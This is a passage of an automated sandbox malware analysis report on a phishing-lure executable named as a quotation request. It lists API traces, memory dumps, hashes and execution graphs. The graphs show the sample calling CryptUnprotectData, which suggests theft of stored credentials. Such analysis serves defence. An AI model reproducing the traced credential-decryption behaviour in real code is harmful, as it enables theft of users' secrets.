                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                                                • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                                                  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1404258612-0
                                                                                                                                • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                                                                                • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                                                                                • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                                                                                APIs
                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004037F6,771B3420,00403621,?), ref: 00403839
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403840
                                                                                                                                Strings
                                                                                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403831
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                                                                • API String ID: 1100898210-2382934351
                                                                                                                                • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                                                                                • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                                                                                • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,80000000,00000003), ref: 00405987
                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe,80000000,00000003), ref: 00405997
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 2709904686-3976562730
                                                                                                                                • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                • Instruction ID: e5431d3d33a146c3150d202dfaa2e9e12a1dec100281116c20088c3141bfb115
                                                                                                                                • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                                                • Instruction Fuzzy Hash: C6D05EA2414920DED3226704DC44AAFA3ACEF113107894466F901E61A5D7785C808AFD
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                                                  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1661666940.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1661650069.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661681060.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1661697008.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloclstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 852173138-0
                                                                                                                                • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                                                • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                                                • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                                                APIs
                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405ACB
                                                                                                                                • lstrcmpiA.KERNEL32(00405CF5,00000000), ref: 00405AE3
                                                                                                                                • CharNextA.USER32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF4
                                                                                                                                • lstrlenA.KERNEL32(00405CF5,?,00000000,00405CF5,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.1640186672.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.1640172757.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640203031.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000426000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640217648.000000000045D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000045F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000046C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                • Associated: 00000005.00000002.1640279447.000000000049F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_5_2_400000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 190613189-0
                                                                                                                                • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                                                                • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                                                • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:11.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:7.6%
                                                                                                                                Total number of Nodes:278
                                                                                                                                Total number of Limit Nodes:27
                                                                                                                                execution_graph 42544 36dd624f 42545 36dd627d 42544->42545 42546 36dd5908 2 API calls 42545->42546 42547 36dd815f 42545->42547 42549 36dd6586 42545->42549 42546->42549 42548 36dd5908 2 API calls 42548->42549 42549->42547 42549->42548 42308 37e51d60 42310 37e51d8d 42308->42310 42309 37e51ddc 42309->42309 42310->42309 42312 37e5153c 42310->42312 42313 37e51547 42312->42313 42316 37e51504 42313->42316 42315 37e51f3c 42315->42309 42317 37e5150f 42316->42317 42320 37e5155c 42317->42320 42319 37e51f95 42319->42315 42321 37e51567 42320->42321 42322 37e52101 GetCurrentThreadId 42321->42322 42323 37e5212b 42321->42323 42322->42323 42323->42319 42324 37e51cc0 SetTimer 42325 37e51d2c 42324->42325 42326 11b1b7 42327 11b149 42326->42327 42328 11b14d 42326->42328 42329 11b1c3 42328->42329 42335 11e478 42328->42335 42330 11b1a3 42343 37e523d0 42330->42343 42349 37e523c1 42330->42349 42336 11e48c 42335->42336 42355 11e6a7 42336->42355 42361 11e6a8 42336->42361 42337 11e498 42367 36dda928 42337->42367 42373 36dda927 42337->42373 42338 11e4c2 42338->42330 42344 37e523df 42343->42344 42427 37e50558 42344->42427 42350 37e523df 42349->42350 42351 37e50558 10 API calls 42350->42351 42352 37e523e6 42351->42352 42353 37e5161c 12 API calls 42352->42353 42354 11b1b1 42353->42354 42356 11e6ca 42355->42356 42357 11e796 42356->42357 42379 36dd5f0c 42356->42379 42385 36dd5908 42356->42385 42392 36dd5b28 42356->42392 42357->42337 42362 11e6ca 42361->42362 42363 11e796 42362->42363 42364 36dd5f0c 3 API calls 42362->42364 42365 36dd5b28 4 API calls 42362->42365 42366 36dd5908 2 API calls 42362->42366 42363->42337 42364->42363 42365->42363 42366->42363 42368 36dda94a 42367->42368 42369 36ddadd9 42368->42369 42370 36dd5b28 4 API calls 42368->42370 42369->42338 42371 36ddaa5c 42370->42371 42371->42369 42400 36ddb1e1 42371->42400 42374 36dda94a 42373->42374 42375 36ddadd9 42374->42375 42376 36dd5b28 4 API calls 42374->42376 42375->42338 42377 36ddaa5c 42376->42377 42377->42375 42378 36ddb1e1 CryptUnprotectData 42377->42378 42378->42377 42383 36dd5dc3 42379->42383 42380 36dd5f04 LdrInitializeThunk 42382 36dd6061 42380->42382 42382->42357 42383->42380 42384 36dd5908 2 API calls 42383->42384 42384->42383 42386 36dd591a 42385->42386 42388 36dd591f 42385->42388 42386->42357 42387 36dd5b5e LdrInitializeThunk 42391 36dd5bf9 42387->42391 42388->42386 42388->42387 42389 36dd5cb9 42389->42357 42390 36dd6049 LdrInitializeThunk 42390->42389 42391->42389 42391->42390 42393 36dd5b5e LdrInitializeThunk 42392->42393 42394 36dd5b59 42392->42394 42399 36dd5bf9 42393->42399 42394->42393 42395 36dd5cb9 42395->42357 42396 36dd5f04 LdrInitializeThunk 42396->42395 42398 36dd5908 2 API calls 42398->42399 42399->42395 42399->42396 42399->42398 42401 36ddb1f0 42400->42401 42405 36ddb830 42401->42405 42414 36ddb820 42401->42414 42402 36ddb260 42402->42371 42406 36ddb855 42405->42406 42407 36ddba0a 42405->42407 42406->42407 42408 36ddb864 42406->42408 42411 36ddb909 42407->42411 42424 36ddb4c0 42407->42424 42412 36ddb830 CryptUnprotectData 42408->42412 42413 36ddb820 CryptUnprotectData 42408->42413 42411->42402 42412->42411 42413->42411 42415 36ddb82a 42414->42415 42416 36ddb7d4 42414->42416 42417 36ddb864 42415->42417 42418 36ddba0a 42415->42418 42416->42402 42422 36ddb830 CryptUnprotectData 42417->42422 42423 36ddb820 CryptUnprotectData 42417->42423 42419 36ddb4c0 CryptUnprotectData 42418->42419 42420 36ddb909 42418->42420 42421 36ddbad5 42419->42421 42420->42402 42421->42402 42422->42420 42423->42420 42425 36ddbcc0 CryptUnprotectData 42424->42425 42426 36ddbad5 42425->42426 42426->42402 42428 37e50568 42427->42428 42429 37e50585 42428->42429 42436 37e505f9 42428->42436 42447 37e50608 42428->42447 42432 37e5161c 42429->42432 42433 37e51627 42432->42433 42466 37e516c4 42433->42466 42435 37e524d6 42435->42435 42437 37e5064e GetCurrentProcess 42436->42437 42439 37e506a0 GetCurrentThread 42437->42439 42440 37e50699 42437->42440 42441 37e506dd GetCurrentProcess 42439->42441 42443 37e506d6 42439->42443 42440->42439 42442 37e50713 42441->42442 42458 37e507d7 42442->42458 42443->42441 42445 37e5076c 42445->42429 42448 37e5064e GetCurrentProcess 42447->42448 42450 37e506a0 GetCurrentThread 42448->42450 42451 37e50699 42448->42451 42452 37e506d6 42450->42452 42453 37e506dd GetCurrentProcess 42450->42453 42451->42450 42452->42453 42454 37e50713 42453->42454 42457 37e507d7 2 API calls 42454->42457 42455 37e5073b GetCurrentThreadId 42456 37e5076c 42455->42456 42456->42429 42457->42455 42462 37e50850 DuplicateHandle 42458->42462 42464 37e50849 DuplicateHandle 42458->42464 42459 37e5073b GetCurrentThreadId 42459->42445 42463 37e508e6 42462->42463 42463->42459 42465 37e508e6 42464->42465 42465->42459 42472 37e516cf 42466->42472 42467 37e52bf9 42468 37e52c29 42467->42468 42469 37e5296c 11 API calls 42467->42469 42473 37e52c54 42468->42473 42488 37e5296c 42468->42488 42469->42468 42471 37e52c41 42471->42473 42494 37e5d478 42471->42494 42500 37e5d467 42471->42500 42472->42467 42472->42473 42478 37e53fc0 42472->42478 42483 37e53fb0 42472->42483 42473->42435 42479 37e53fe1 42478->42479 42480 37e54005 42479->42480 42506 37e54170 42479->42506 42512 37e5415f 42479->42512 42480->42467 42484 37e53fe1 42483->42484 42485 37e54005 42484->42485 42486 37e54170 10 API calls 42484->42486 42487 37e5415f 10 API calls 42484->42487 42485->42467 42486->42485 42487->42485 42490 37e52977 42488->42490 42489 37e5cf11 42489->42471 42490->42489 42491 37e50558 10 API calls 42490->42491 42492 37e5cf2b 42491->42492 42530 37e5c3f4 42492->42530 42495 37e5d4dd 42494->42495 42496 37e5d709 42495->42496 42498 37e5d52a 42495->42498 42537 37e5c4bc 42495->42537 42497 37e50558 10 API calls 42496->42497 42497->42498 42498->42473 42505 37e5d4dd 42500->42505 42501 37e5d709 42502 37e50558 10 API calls 42501->42502 42503 37e5d52a 42502->42503 42503->42473 42504 37e5c4bc DispatchMessageW 42504->42505 42505->42501 42505->42503 42505->42504 42507 37e5417d 42506->42507 42508 37e50558 10 API calls 42507->42508 42509 37e541ab 42508->42509 42510 37e541b6 42509->42510 42518 37e52efc 42509->42518 42510->42480 42514 37e54170 42512->42514 42513 37e50558 10 API calls 42515 37e541ab 42513->42515 42514->42513 42516 37e52efc 10 API calls 42515->42516 42517 37e541b6 42515->42517 42516->42517 42517->42480 42519 37e52f07 42518->42519 42521 37e54228 42519->42521 42522 37e52f30 42519->42522 42521->42521 42523 37e52f3b 42522->42523 42526 37e52f40 42523->42526 42525 37e54297 42525->42521 42529 37e52f4b 42526->42529 42527 37e55440 42527->42525 42528 37e53fc0 10 API calls 42528->42527 42529->42527 42529->42528 42531 37e5c3ff 42530->42531 42532 37e5d22b 42531->42532 42534 37e5c410 42531->42534 42532->42489 42535 37e5d260 OleInitialize 42534->42535 42536 37e5d2c4 42535->42536 42536->42532 42538 37e5e540 DispatchMessageW 42537->42538 42539 37e5e5ac 42538->42539 42539->42495 42540 11fd98 42541 11fe00 CreateWindowExW 42540->42541 42543 11febc 42541->42543 42550 ad030 42551 ad048 42550->42551 42552 ad0a2 42551->42552 42558 11ff50 42551->42558 42563 36ddfd40 42551->42563 42566 37e51870 42551->42566 42577 37e51860 42551->42577 42588 11ff40 42551->42588 42560 11ff76 42558->42560 42559 11ff97 42559->42552 42561 37e51860 2 API calls 42560->42561 42562 37e51870 2 API calls 42560->42562 42561->42559 42562->42559 42564 36ddfd57 42563->42564 42593 37e50460 42563->42593 42564->42552 42569 37e5189d 42566->42569 42567 37e518d1 42571 37e518cf 42567->42571 42636 37e514e4 42567->42636 42569->42567 42570 37e518c1 42569->42570 42570->42571 42602 37e59af8 42570->42602 42607 37e59ae8 42570->42607 42612 37e519f8 42570->42612 42621 37e519e8 42570->42621 42630 37e59bc4 42570->42630 42578 37e5189d 42577->42578 42579 37e518d1 42578->42579 42581 37e518c1 42578->42581 42580 37e514e4 CallWindowProcW 42579->42580 42582 37e518cf 42579->42582 42580->42582 42581->42582 42583 37e59bc4 CallWindowProcW 42581->42583 42584 37e519e8 2 API calls 42581->42584 42585 37e519f8 2 API calls 42581->42585 42586 37e59ae8 CallWindowProcW 42581->42586 42587 37e59af8 CallWindowProcW 42581->42587 42583->42582 42584->42582 42585->42582 42586->42582 42587->42582 42589 11ff76 42588->42589 42591 37e51860 2 API calls 42589->42591 42592 37e51870 2 API calls 42589->42592 42590 11ff97 42590->42552 42591->42590 42592->42590 42594 37e50476 42593->42594 42596 37e50558 10 API calls 42593->42596 42597 37e50548 42593->42597 42594->42564 42596->42594 42598 37e50568 42597->42598 42599 37e50585 42598->42599 42600 37e505f9 6 API calls 42598->42600 42601 37e50608 6 API calls 42598->42601 42599->42594 42600->42599 42601->42599 42604 37e59b0c 42602->42604 42603 37e59b98 42603->42571 42640 37e59bb0 42604->42640 42643 37e59ba2 42604->42643 42609 37e59af8 42607->42609 42608 37e59b98 42608->42571 42610 37e59bb0 CallWindowProcW 42609->42610 42611 37e59ba2 CallWindowProcW 42609->42611 42610->42608 42611->42608 42613 37e51a33 42612->42613 42614 37e51a06 42612->42614 42613->42614 42615 37e51a38 42613->42615 42616 37e51a0e 42614->42616 42618 37e514e4 CallWindowProcW 42614->42618 42617 37e51504 GetCurrentThreadId 42615->42617 42616->42571 42619 37e51a44 42617->42619 42620 37e51a4c 42618->42620 42619->42571 42620->42571 42622 37e51a06 42621->42622 42623 37e51a33 42621->42623 42626 37e514e4 CallWindowProcW 42622->42626 42629 37e51a0e 42622->42629 42623->42622 42624 37e51a38 42623->42624 42625 37e51504 GetCurrentThreadId 42624->42625 42627 37e51a44 42625->42627 42628 37e51a4c 42626->42628 42627->42571 42628->42571 42629->42571 42631 37e59b82 42630->42631 42632 37e59bd2 42630->42632 42634 37e59bb0 CallWindowProcW 42631->42634 42635 37e59ba2 CallWindowProcW 42631->42635 42633 37e59b98 42633->42571 42634->42633 42635->42633 42637 37e514ef 42636->42637 42638 37e51afa CallWindowProcW 42637->42638 42639 37e51aa9 42637->42639 42638->42639 42639->42571 42641 37e59bc1 42640->42641 42647 37e5ad80 42640->42647 42641->42603 42644 37e59bb0 42643->42644 42645 37e59bc1 42644->42645 42646 37e5ad80 CallWindowProcW 42644->42646 42645->42603 42646->42645 42648 37e514e4 CallWindowProcW 42647->42648 42649 37e5ad8a 42648->42649 42649->42641

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1883 36dd5b28-36dd5b57 1884 36dd5b5e-36dd5bf4 LdrInitializeThunk 1883->1884 1885 36dd5b59 1883->1885 1886 36dd5c93-36dd5c99 1884->1886 1885->1884 1887 36dd5c9f-36dd5cb7 1886->1887 1888 36dd5bf9-36dd5c0c 1886->1888 1889 36dd5cb9-36dd5cc6 1887->1889 1890 36dd5ccb-36dd5cde 1887->1890 1891 36dd5c0e 1888->1891 1892 36dd5c13-36dd5c64 1888->1892 1895 36dd6061-36dd615f 1889->1895 1893 36dd5ce5-36dd5d01 1890->1893 1894 36dd5ce0 1890->1894 1891->1892 1908 36dd5c77-36dd5c89 1892->1908 1909 36dd5c66-36dd5c74 1892->1909 1897 36dd5d08-36dd5d2c 1893->1897 1898 36dd5d03 1893->1898 1894->1893 1900 36dd6167-36dd6171 1895->1900 1901 36dd6161-36dd6166 1895->1901 1905 36dd5d2e 1897->1905 1906 36dd5d33-36dd5d65 1897->1906 1898->1897 1901->1900 1905->1906 1914 36dd5d6c-36dd5dae 1906->1914 1915 36dd5d67 1906->1915 1911 36dd5c8b 1908->1911 1912 36dd5c90 1908->1912 1909->1887 1911->1912 1912->1886 1917 36dd5db5-36dd5dbe 1914->1917 1918 36dd5db0 1914->1918 1915->1914 1919 36dd5fe6-36dd5fec 1917->1919 1918->1917 1920 36dd5dc3-36dd5de8 1919->1920 1921 36dd5ff2-36dd6005 1919->1921 1922 36dd5def-36dd5e26 1920->1922 1923 36dd5dea 1920->1923 1924 36dd600c-36dd6027 1921->1924 1925 36dd6007 1921->1925 1933 36dd5e2d-36dd5e5f 1922->1933 1934 36dd5e28 1922->1934 1923->1922 1926 36dd602e-36dd6042 1924->1926 1927 36dd6029 1924->1927 1925->1924 1930 36dd6049-36dd605f LdrInitializeThunk 1926->1930 1931 36dd6044 1926->1931 1927->1926 1930->1895 1931->1930 1936 36dd5e61-36dd5e86 1933->1936 1937 36dd5ec3-36dd5ed6 1933->1937 1934->1933 1938 36dd5e8d-36dd5ebb 1936->1938 1939 36dd5e88 1936->1939 1940 36dd5edd-36dd5f02 1937->1940 1941 36dd5ed8 1937->1941 1938->1937 1939->1938 1944 36dd5f04-36dd5f05 1940->1944 1945 36dd5f11-36dd5f49 1940->1945 1941->1940 1944->1921 1946 36dd5f4b 1945->1946 1947 36dd5f50-36dd5fb1 call 36dd5908 1945->1947 1946->1947 1953 36dd5fb8-36dd5fdc 1947->1953 1954 36dd5fb3 1947->1954 1957 36dd5fde 1953->1957 1958 36dd5fe3 1953->1958 1954->1953 1957->1958 1958->1919
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558107577.0000000036DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36DD0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_36dd0000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: 244c07c6c35b0287a51352dd34018495dbae69fc6b372dba90159501d0bf6a57
                                                                                                                                • Instruction ID: da2902b50c883763e5787be6ead9e9a342722a55518a19d7c501579160c40687
                                                                                                                                • Opcode Fuzzy Hash: 244c07c6c35b0287a51352dd34018495dbae69fc6b372dba90159501d0bf6a57
                                                                                                                                • Instruction Fuzzy Hash: CEF1D474E01218CFEB14DFA9C884B9DFBB2BF88304F5481A9D848AB395DB759985CF50

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1959 37e5e600-37e5e62b 1960 37e5e632-37e5e692 1959->1960 1961 37e5e62d 1959->1961 1963 37e5e9c5-37e5e9ed 1960->1963 1964 37e5e698-37e5e7a9 1960->1964 1961->1960 1967 37e5e9f3-37e5ea20 1963->1967 1968 37e5f178-37e5f1a0 1963->1968 2006 37e5e7d3 1964->2006 2007 37e5e7ab-37e5e7b7 1964->2007 1973 37e5ea26-37e5ec2a 1967->1973 1974 37e5ed1e-37e5f089 1967->1974 1975 37e5f1a6-37e5f407 call 113168 call 36dfa709 1968->1975 1976 37e5f439 1968->1976 2075 37e5ec43-37e5ec54 1973->2075 2076 37e5ec2c-37e5ec41 1973->2076 2119 37e5f0a2-37e5f0b3 1974->2119 2120 37e5f08b-37e5f0a0 1974->2120 2100 37e5f40c-37e5f40e 1975->2100 1977 37e5f43a-37e5f441 1976->1977 2012 37e5e7d9-37e5e97b 2006->2012 2009 37e5e7c1-37e5e7c7 2007->2009 2010 37e5e7b9-37e5e7bf 2007->2010 2014 37e5e7d1 2009->2014 2010->2014 2090 37e5e97d-37e5e989 2012->2090 2091 37e5e98a 2012->2091 2014->2012 2083 37e5ec55-37e5ed19 2075->2083 2076->2083 2111 37e5f177 2083->2111 2090->2091 2091->1963 2100->1977 2111->1968 2123 37e5f0b4-37e5f176 2119->2123 2120->2123 2123->2111
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000A.00000002.2558925034.0000000037E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37E50000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_10_2_37e50000_REQUEST FOR QUOATION AND PRICES.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Teq$p@q
                                                                                                                                • API String ID: 0-2716814348
                                                                                                                                • Opcode ID: 53bb3c4fbc63c8a1a5b00d1f511a9c76cb3604d5b75ed72e882d13cc77ea5aa8
                                                                                                                                • Instruction ID: 93876abdf6918aaa97e7f4c2a51ed9cd860d871541cd4c5fba0f3518cf3ebdb7
                                                                                                                                • Opcode Fuzzy Hash: 53bb3c4fbc63c8a1a5b00d1f511a9c76cb3604d5b75ed72e882d13cc77ea5aa8
                                                                                                                                • Instruction Fuzzy Hash: 9582C374A00228CFDB25DF64D954B99BBB2FF89301F5081E9D909A7364CB35AE82DF50

